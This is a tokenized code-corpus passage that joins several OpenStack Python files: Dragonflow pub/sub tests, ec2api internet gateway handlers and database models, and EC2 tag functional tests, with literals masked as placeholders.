<EOL> subscriber . register_listen_address ( uri ) <EOL> subscriber . daemonize ( ) <EOL> return subscriber <EOL> class Namespace ( object ) : <EOL> pass <EOL> class TestPubSub ( test_base . DFTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( TestPubSub , self ) . setUp ( ) <EOL> self . events_num = <NUM_LIT:0> <EOL> self . do_test = cfg . CONF . df . enable_df_pub_sub <EOL> self . key = '<STR_LIT>' . format ( random . random ( ) ) <EOL> def test_pub_sub_add_port ( self ) : <EOL> global events_num <EOL> local_event_num = <NUM_LIT:0> <EOL> if not self . 
do_test : <EOL> return <EOL> def _db_change_callback ( table , key , action , value , topic ) : <EOL> global events_num <EOL> events_num += <NUM_LIT:1> <EOL> subscriber = get_subscriber ( _db_change_callback ) <EOL> network = self . store ( objects . NetworkTestObj ( self . neutron , self . nb_api ) ) <EOL> network_id = network . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> local_event_num = events_num <EOL> port = self . store ( objects . PortTestObj ( <EOL> self . neutron , <EOL> self . nb_api , <EOL> network_id <EOL> ) ) <EOL> port . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> local_event_num = events_num <EOL> port . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> local_event_num = events_num <EOL> network . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> subscriber . stop ( ) <EOL> self . assertFalse ( network . exists ( ) ) <EOL> def test_pub_sub_update_port ( self ) : <EOL> ns = Namespace ( ) <EOL> ns . events_num = <NUM_LIT:0> <EOL> local_event_num = <NUM_LIT:0> <EOL> if not self . do_test : <EOL> return <EOL> def _db_change_callback ( table , key , action , value , topic ) : <EOL> ns . events_num += <NUM_LIT:1> <EOL> subscriber = get_subscriber ( _db_change_callback ) <EOL> network = self . store ( objects . NetworkTestObj ( self . neutron , self . nb_api ) ) <EOL> network_id = network . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , ns . events_num ) <EOL> port = self . store ( objects . PortTestObj ( <EOL> self . neutron , <EOL> self . nb_api , <EOL> network_id <EOL> ) ) <EOL> local_event_num = ns . 
events_num <EOL> port_id = port . create ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , ns . events_num ) <EOL> local_event_num = ns . events_num <EOL> update = { '<STR_LIT:port>' : { '<STR_LIT:name>' : '<STR_LIT:test>' } } <EOL> for i in six . moves . range ( <NUM_LIT:100> ) : <EOL> name = "<STR_LIT>" % i <EOL> update [ '<STR_LIT:port>' ] [ '<STR_LIT:name>' ] = name <EOL> self . neutron . update_port ( port_id , update ) <EOL> eventlet . sleep ( <NUM_LIT:0> ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertGreaterEqual ( ns . events_num , local_event_num + <NUM_LIT:100> ) <EOL> local_event_num = ns . events_num <EOL> port . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , ns . events_num ) <EOL> local_event_num = ns . events_num <EOL> network . close ( ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertNotEqual ( local_event_num , events_num ) <EOL> subscriber . stop ( ) <EOL> self . assertFalse ( network . exists ( ) ) <EOL> def test_pub_sub_event_number_diffrent_port ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> ns = Namespace ( ) <EOL> ns . events_num = <NUM_LIT:0> <EOL> ns . events_action = None <EOL> def _db_change_callback ( table , key , action , value , topic ) : <EOL> if '<STR_LIT>' == key : <EOL> ns . events_num += <NUM_LIT:1> <EOL> ns . events_action = action <EOL> publisher = get_publisher ( ) <EOL> subscriber = get_subscriber ( _db_change_callback ) <EOL> eventlet . sleep ( <NUM_LIT:2> ) <EOL> local_events_num = ns . events_num <EOL> action = "<STR_LIT>" <EOL> update = DbUpdate ( '<STR_LIT:info>' , '<STR_LIT>' , action , "<STR_LIT>" ) <EOL> publisher . send_event ( update ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( local_events_num + <NUM_LIT:1> , ns . events_num ) <EOL> self . assertEqual ( ns . 
events_action , action ) <EOL> local_events_num = ns . events_num <EOL> for i in six . moves . range ( <NUM_LIT:100> ) : <EOL> publisher . send_event ( update ) <EOL> eventlet . sleep ( <NUM_LIT> ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( local_events_num + <NUM_LIT:100> , ns . events_num ) <EOL> subscriber . stop ( ) <EOL> def test_pub_sub_add_topic ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> self . events_num_t = <NUM_LIT:0> <EOL> self . events_action_t = None <EOL> def _db_change_callback_topic ( table , key , action , value , topic ) : <EOL> if '<STR_LIT>' == key : <EOL> self . events_num_t += <NUM_LIT:1> <EOL> self . events_action_t = action <EOL> publisher = get_publisher ( ) <EOL> subscriber = get_subscriber ( _db_change_callback_topic ) <EOL> eventlet . sleep ( <NUM_LIT:2> ) <EOL> topic = "<STR_LIT>" <EOL> subscriber . register_topic ( topic ) <EOL> eventlet . sleep ( <NUM_LIT:0.5> ) <EOL> local_events_num = self . events_num_t <EOL> action = "<STR_LIT>" <EOL> update = DbUpdate ( <EOL> '<STR_LIT:info>' , <EOL> '<STR_LIT>' , <EOL> action , <EOL> "<STR_LIT>" <EOL> ) <EOL> publisher . send_event ( update , topic ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( self . events_action_t , action ) <EOL> self . assertEqual ( local_events_num + <NUM_LIT:1> , self . events_num_t ) <EOL> no_topic_action = '<STR_LIT>' <EOL> other_topic = "<STR_LIT>" <EOL> self . events_action_t = None <EOL> update = DbUpdate ( '<STR_LIT:info>' , None , no_topic_action , "<STR_LIT>" ) <EOL> publisher . send_event ( update , other_topic ) <EOL> eventlet . sleep ( <NUM_LIT:1> ) <EOL> self . assertEqual ( self . events_action_t , None ) <EOL> self . assertNotEqual ( local_events_num + <NUM_LIT:2> , self . events_num_t ) <EOL> subscriber . unregister_topic ( topic ) <EOL> publisher . send_event ( update , topic ) <EOL> self . assertEqual ( self . events_action_t , None ) <EOL> subscriber . 
stop ( ) <EOL> class TestMultiprocPubSub ( test_base . DFTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( TestMultiprocPubSub , self ) . setUp ( ) <EOL> self . do_test = cfg . CONF . df . enable_df_pub_sub <EOL> self . key = '<STR_LIT>' . format ( random . random ( ) ) <EOL> self . event = DbUpdate ( <EOL> '<STR_LIT:info>' , <EOL> None , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> topic = SEND_ALL_TOPIC , <EOL> ) <EOL> self . subscriber = None <EOL> def tearDown ( self ) : <EOL> if self . subscriber : <EOL> self . subscriber . stop ( ) <EOL> super ( TestMultiprocPubSub , self ) . tearDown ( ) <EOL> def _verify_event ( self , table , key , action , value , topic ) : <EOL> self . assertEqual ( self . event . table , table ) <EOL> self . assertEqual ( self . event . key , key ) <EOL> self . assertEqual ( self . event . action , action ) <EOL> self . assertEqual ( self . event . topic , topic ) <EOL> self . event_received = True <EOL> def test_multiproc_pub_sub ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> self . event_received = False <EOL> cfg . CONF . df . publisher_multiproc_socket = '<STR_LIT>' <EOL> pub_sub_driver = df_utils . load_driver ( <EOL> cfg . CONF . df . pub_sub_multiproc_driver , <EOL> df_utils . DF_PUBSUB_DRIVER_NAMESPACE ) <EOL> publisher = pub_sub_driver . get_publisher ( ) <EOL> publisher . initialize ( ) <EOL> self . subscriber = pub_sub_driver . get_subscriber ( ) <EOL> self . subscriber . initialize ( self . _verify_event ) <EOL> self . subscriber . daemonize ( ) <EOL> publisher . send_event ( self . event ) <EOL> wait_until_true ( lambda : self . event_received ) <EOL> self . subscriber . stop ( ) <EOL> self . subscriber = None <EOL> class TestDbTableMonitors ( test_base . DFTestBase ) : <EOL> def setUp ( self ) : <EOL> super ( TestDbTableMonitors , self ) . setUp ( ) <EOL> self . events_num = <NUM_LIT:0> <EOL> enable_df_pub_sub = cfg . CONF . df . enable_df_pub_sub <EOL> self . 
do_test = enable_df_pub_sub <EOL> if not self . do_test : <EOL> return <EOL> self . namespace = Namespace ( ) <EOL> self . namespace . events = [ ] <EOL> self . publisher = get_publisher ( ) <EOL> self . subscriber = get_subscriber ( self . _db_change_callback ) <EOL> self . monitor = self . _create_monitor ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> if self . do_test : <EOL> self . monitor . stop ( ) <EOL> self . subscriber . stop ( ) <EOL> super ( TestDbTableMonitors , self ) . tearDown ( ) <EOL> def _db_change_callback ( self , table , key , action , value , topic ) : <EOL> self . namespace . events . append ( { <EOL> '<STR_LIT>' : table , <EOL> '<STR_LIT:key>' : key , <EOL> '<STR_LIT:action>' : action , <EOL> '<STR_LIT:value>' : value , <EOL> } ) <EOL> def _create_monitor ( self , table_name ) : <EOL> table_monitor = TableMonitor ( <EOL> table_name , <EOL> self . nb_api . driver , <EOL> self . publisher , <EOL> <NUM_LIT:1> , <EOL> ) <EOL> table_monitor . daemonize ( ) <EOL> return table_monitor <EOL> def test_operations ( self ) : <EOL> if not self . do_test : <EOL> return <EOL> expected_event = { <EOL> '<STR_LIT>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:key>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:action>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:value>' : None , <EOL> } <EOL> self . assertNotIn ( expected_event , self . namespace . events ) <EOL> self . nb_api . driver . create_key ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> jsonutils . dumps ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT>' } ) ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertIn ( expected_event , self . namespace . events ) <EOL> expected_event = { <EOL> '<STR_LIT>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:key>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:action>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:value>' : None , <EOL> } <EOL> self . assertNotIn ( expected_event , self . namespace . events ) <EOL> self . 
nb_api . driver . set_key ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> jsonutils . dumps ( { '<STR_LIT:name>' : '<STR_LIT>' , '<STR_LIT:data>' : '<STR_LIT>' } ) ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertIn ( expected_event , self . namespace . events ) <EOL> expected_event = { <EOL> '<STR_LIT>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:key>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:action>' : unicode ( '<STR_LIT>' ) , <EOL> '<STR_LIT:value>' : None , <EOL> } <EOL> self . assertNotIn ( expected_event , self . namespace . events ) <EOL> self . nb_api . driver . delete_key ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> eventlet . sleep ( test_utils . DEFAULT_CMD_TIMEOUT ) <EOL> self . assertIn ( expected_event , self . namespace . events ) </s>
<s> """<STR_LIT>""" <EOL> from neutronclient . common import exceptions as neutron_exception <EOL> from oslo_log import log as logging <EOL> from ec2api . api import common <EOL> from ec2api . api import ec2utils <EOL> from ec2api import clients <EOL> from ec2api . db import api as db_api <EOL> from ec2api import exception <EOL> from ec2api . i18n import _ <EOL> LOG = logging . getLogger ( __name__ ) <EOL> """<STR_LIT>""" <EOL> Validator = common . Validator <EOL> def create_internet_gateway ( context ) : <EOL> igw = db_api . add_item ( context , '<STR_LIT>' , { } ) <EOL> return { '<STR_LIT>' : _format_internet_gateway ( igw ) } <EOL> def attach_internet_gateway ( context , internet_gateway_id , vpc_id ) : <EOL> igw = ec2utils . get_db_item ( context , internet_gateway_id ) <EOL> if igw . get ( '<STR_LIT>' ) : <EOL> msg_params = { '<STR_LIT>' : igw [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : igw [ '<STR_LIT>' ] } <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % msg_params <EOL> raise exception . ResourceAlreadyAssociated ( msg ) <EOL> vpc = ec2utils . get_db_item ( context , vpc_id ) <EOL> if ec2utils . get_attached_gateway ( context , vpc [ '<STR_LIT:id>' ] , '<STR_LIT>' ) : <EOL> msg = _ ( '<STR_LIT>' <EOL> '<STR_LIT>' ) % { '<STR_LIT>' : vpc [ '<STR_LIT:id>' ] } <EOL> raise exception . InvalidParameterValue ( msg ) <EOL> external_network_id = None <EOL> if not ec2utils . get_attached_gateway ( context , vpc [ '<STR_LIT:id>' ] , '<STR_LIT>' ) : <EOL> external_network_id = ec2utils . get_os_public_network ( context ) [ '<STR_LIT:id>' ] <EOL> neutron = clients . neutron ( context ) <EOL> with common . OnCrashCleaner ( ) as cleaner : <EOL> _attach_internet_gateway_item ( context , igw , vpc [ '<STR_LIT:id>' ] ) <EOL> cleaner . addCleanup ( _detach_internet_gateway_item , context , igw ) <EOL> if external_network_id : <EOL> neutron . 
add_gateway_router ( vpc [ '<STR_LIT>' ] , <EOL> { '<STR_LIT>' : external_network_id } ) <EOL> return True <EOL> def detach_internet_gateway ( context , internet_gateway_id , vpc_id ) : <EOL> igw = ec2utils . get_db_item ( context , internet_gateway_id ) <EOL> vpc = ec2utils . get_db_item ( context , vpc_id ) <EOL> if igw . get ( '<STR_LIT>' ) != vpc [ '<STR_LIT:id>' ] : <EOL> raise exception . GatewayNotAttached ( gw_id = igw [ '<STR_LIT:id>' ] , <EOL> vpc_id = vpc [ '<STR_LIT:id>' ] ) <EOL> remove_os_gateway_router = ( <EOL> ec2utils . get_attached_gateway ( context , vpc_id , '<STR_LIT>' ) is None ) <EOL> neutron = clients . neutron ( context ) <EOL> with common . OnCrashCleaner ( ) as cleaner : <EOL> _detach_internet_gateway_item ( context , igw ) <EOL> cleaner . addCleanup ( _attach_internet_gateway_item , <EOL> context , igw , vpc [ '<STR_LIT:id>' ] ) <EOL> if remove_os_gateway_router : <EOL> try : <EOL> neutron . remove_gateway_router ( vpc [ '<STR_LIT>' ] ) <EOL> except neutron_exception . NotFound : <EOL> pass <EOL> return True <EOL> def delete_internet_gateway ( context , internet_gateway_id ) : <EOL> igw = ec2utils . get_db_item ( context , internet_gateway_id ) <EOL> if igw . get ( '<STR_LIT>' ) : <EOL> msg = _ ( "<STR_LIT>" <EOL> "<STR_LIT>" ) % { '<STR_LIT>' : igw [ '<STR_LIT:id>' ] } <EOL> raise exception . DependencyViolation ( msg ) <EOL> db_api . delete_item ( context , igw [ '<STR_LIT:id>' ] ) <EOL> return True <EOL> class InternetGatewayDescriber ( common . TaggableItemsDescriber , <EOL> common . NonOpenstackItemsDescriber ) : <EOL> KIND = '<STR_LIT>' <EOL> FILTER_MAP = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:state>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] } <EOL> def format ( self , igw ) : <EOL> return _format_internet_gateway ( igw ) <EOL> def describe_internet_gateways ( context , internet_gateway_id = None , <EOL> filter = None ) : <EOL> formatted_igws = InternetGatewayDescriber ( ) . 
describe ( <EOL> context , ids = internet_gateway_id , filter = filter ) <EOL> return { '<STR_LIT>' : formatted_igws } <EOL> def _format_internet_gateway ( igw ) : <EOL> ec2_igw = { '<STR_LIT>' : igw [ '<STR_LIT:id>' ] , <EOL> '<STR_LIT>' : [ ] } <EOL> if igw . get ( '<STR_LIT>' ) : <EOL> attachment_state = '<STR_LIT>' <EOL> attachment = { '<STR_LIT>' : igw [ '<STR_LIT>' ] , <EOL> '<STR_LIT:state>' : attachment_state } <EOL> ec2_igw [ '<STR_LIT>' ] . append ( attachment ) <EOL> return ec2_igw <EOL> def _attach_internet_gateway_item ( context , igw , vpc_id ) : <EOL> igw [ '<STR_LIT>' ] = vpc_id <EOL> db_api . update_item ( context , igw ) <EOL> def _detach_internet_gateway_item ( context , igw ) : <EOL> igw [ '<STR_LIT>' ] = None <EOL> db_api . update_item ( context , igw ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_db . sqlalchemy import models <EOL> from sqlalchemy . ext . declarative import declarative_base <EOL> from sqlalchemy import Column , PrimaryKeyConstraint , String , Text <EOL> from sqlalchemy import UniqueConstraint <EOL> BASE = declarative_base ( ) <EOL> ITEMS_OS_ID_INDEX_NAME = '<STR_LIT>' <EOL> class EC2Base ( models . ModelBase ) : <EOL> metadata = None <EOL> def save ( self , session = None ) : <EOL> from ec2api . db . sqlalchemy import api <EOL> if session is None : <EOL> session = api . get_session ( ) <EOL> super ( EC2Base , self ) . save ( session = session ) <EOL> class Item ( BASE , EC2Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( <EOL> PrimaryKeyConstraint ( '<STR_LIT:id>' ) , <EOL> UniqueConstraint ( '<STR_LIT>' , name = ITEMS_OS_ID_INDEX_NAME ) , <EOL> ) <EOL> id = Column ( String ( length = <NUM_LIT:30> ) ) <EOL> project_id = Column ( String ( length = <NUM_LIT:64> ) ) <EOL> vpc_id = Column ( String ( length = <NUM_LIT:12> ) ) <EOL> os_id = Column ( String ( length = <NUM_LIT> ) ) <EOL> data = Column ( Text ( ) ) <EOL> class Tag ( BASE , EC2Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> __table_args__ = ( <EOL> PrimaryKeyConstraint ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' ) , <EOL> ) <EOL> project_id = Column ( String ( length = <NUM_LIT:64> ) ) <EOL> item_id = Column ( String ( length = <NUM_LIT:30> ) ) <EOL> key = Column ( String ( length = <NUM_LIT> ) ) <EOL> value = Column ( String ( length = <NUM_LIT:255> ) ) </s>
<s> import time <EOL> from tempest . lib . common . utils import data_utils <EOL> import testtools <EOL> from ec2api . tests . functional import base <EOL> from ec2api . tests . functional import config <EOL> CONF = config . CONF <EOL> class TagTest ( base . EC2TestCase ) : <EOL> @ classmethod <EOL> @ base . safe_setup <EOL> def setUpClass ( cls ) : <EOL> super ( TagTest , cls ) . setUpClass ( ) <EOL> cls . zone = CONF . aws . aws_zone <EOL> data = cls . client . create_volume ( <EOL> Size = <NUM_LIT:1> , AvailabilityZone = cls . zone ) <EOL> cls . volume_id = data [ '<STR_LIT>' ] <EOL> cls . addResourceCleanUpStatic ( cls . client . delete_volume , <EOL> VolumeId = cls . volume_id ) <EOL> cls . get_volume_waiter ( ) . wait_available ( cls . volume_id ) <EOL> def test_create_get_delete_tag ( self ) : <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . client . create_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . addResourceCleanUp ( self . client . delete_tags , <EOL> Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . client . delete_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( data [ '<STR_LIT>' ] ) ) <EOL> def test_describe_tags ( self ) : <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . client . create_tags ( Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . addResourceCleanUp ( self . client . 
delete_tags , <EOL> Resources = [ self . volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> tag = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> self . assertEqual ( '<STR_LIT>' , tag . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( self . volume_id , tag . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( tag_key , tag . get ( '<STR_LIT>' ) ) <EOL> self . assertEqual ( '<STR_LIT>' , tag . get ( '<STR_LIT>' ) ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } , <EOL> { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ tag_key ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ tag_key ] } ] ) <EOL> self . assertIn ( tag_key , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT:value>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> self . assertIn ( '<STR_LIT>' , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT:key>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> items = [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] <EOL> self . assertNotIn ( tag_key , items ) <EOL> self . assertNotIn ( '<STR_LIT>' , items ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ '<STR_LIT>' ] } ] ) <EOL> self . assertIn ( tag_key , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> self . client . delete_tags ( Resources = [ self . 
volume_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ self . volume_id ] } ] ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( data [ '<STR_LIT>' ] ) ) <EOL> def _test_tag_resource ( self , resource_id , res_type , describe_func ) : <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> origin_count = len ( data [ '<STR_LIT>' ] ) <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> data = self . client . create_tags ( Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> self . addResourceCleanUp ( self . client . delete_tags , <EOL> Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> self . assertEqual ( origin_count + <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ res_type ] } ] ) <EOL> self . assertIn ( tag_key , [ k . get ( '<STR_LIT>' ) for k in data [ '<STR_LIT>' ] ] ) <EOL> describe_func ( Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ tag_key ] } ] ) <EOL> self . client . delete_tags ( Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> self . assertEqual ( origin_count , len ( data [ '<STR_LIT>' ] ) ) <EOL> def _test_tag_resource_negative ( self , resource_id ) : <EOL> data = self . client . describe_tags ( <EOL> Filters = [ { '<STR_LIT:Name>' : '<STR_LIT>' , '<STR_LIT>' : [ resource_id ] } ] ) <EOL> self . 
assertEmpty ( data [ '<STR_LIT>' ] ) <EOL> def _rollback ( fn_data ) : <EOL> self . client . delete_tags ( Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key } ] ) <EOL> tag_key = data_utils . rand_name ( '<STR_LIT>' ) <EOL> self . assertRaises ( '<STR_LIT>' , <EOL> self . client . create_tags , rollback_fn = _rollback , <EOL> Resources = [ resource_id ] , <EOL> Tags = [ { '<STR_LIT>' : tag_key , '<STR_LIT>' : '<STR_LIT>' } ] ) <EOL> def test_tag_image ( self ) : <EOL> image_id = CONF . aws . ebs_image_id <EOL> if not image_id : <EOL> image_id = CONF . aws . image_id <EOL> if not image_id : <EOL> raise self . skipException ( '<STR_LIT>' ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_images ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( image_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( image_id , '<STR_LIT:image>' , describe_func ) <EOL> data = self . client . describe_images ( ImageIds = [ image_id ] ) <EOL> image = data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] <EOL> if '<STR_LIT>' in image : <EOL> image_id = image [ '<STR_LIT>' ] <EOL> self . _test_tag_resource ( image_id , '<STR_LIT:image>' , describe_func ) <EOL> if '<STR_LIT>' in image : <EOL> image_id = image [ '<STR_LIT>' ] <EOL> self . _test_tag_resource ( image_id , '<STR_LIT:image>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_dhcp_options ( self ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : [ <EOL> { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> ] , <EOL> } <EOL> data = self . client . create_dhcp_options ( * [ ] , ** kwargs ) <EOL> options = data [ '<STR_LIT>' ] <EOL> res_id = options [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . delete_dhcp_options , <EOL> DhcpOptionsId = res_id ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . 
client . describe_dhcp_options ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( res_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( res_id , '<STR_LIT>' , describe_func ) <EOL> self . client . delete_dhcp_options ( DhcpOptionsId = res_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> def test_tag_volume ( self ) : <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_volumes ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( self . volume_id , data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource ( self . volume_id , '<STR_LIT>' , describe_func ) <EOL> @ base . skip_without_vpc ( ) <EOL> def test_tag_address ( self ) : <EOL> kwargs = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> data = self . client . allocate_address ( * [ ] , ** kwargs ) <EOL> res_id = data [ '<STR_LIT>' ] <EOL> res_clean = self . addResourceCleanUp ( self . client . release_address , <EOL> AllocationId = res_id ) <EOL> self . assertEqual ( '<STR_LIT>' , data [ '<STR_LIT>' ] ) <EOL> self . _test_tag_resource_negative ( res_id ) <EOL> self . client . release_address ( AllocationId = res_id ) <EOL> self . cancelResourceCleanUp ( res_clean ) <EOL> @ testtools . skipUnless ( CONF . aws . image_id , "<STR_LIT>" ) <EOL> def test_tag_instance ( self ) : <EOL> instance_id = self . run_instance ( ) <EOL> def describe_func ( * args , ** kwargs ) : <EOL> data = self . client . describe_instances ( * args , ** kwargs ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , len ( data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) ) <EOL> self . assertEqual ( instance_id , <EOL> data [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] ) <EOL> self . 
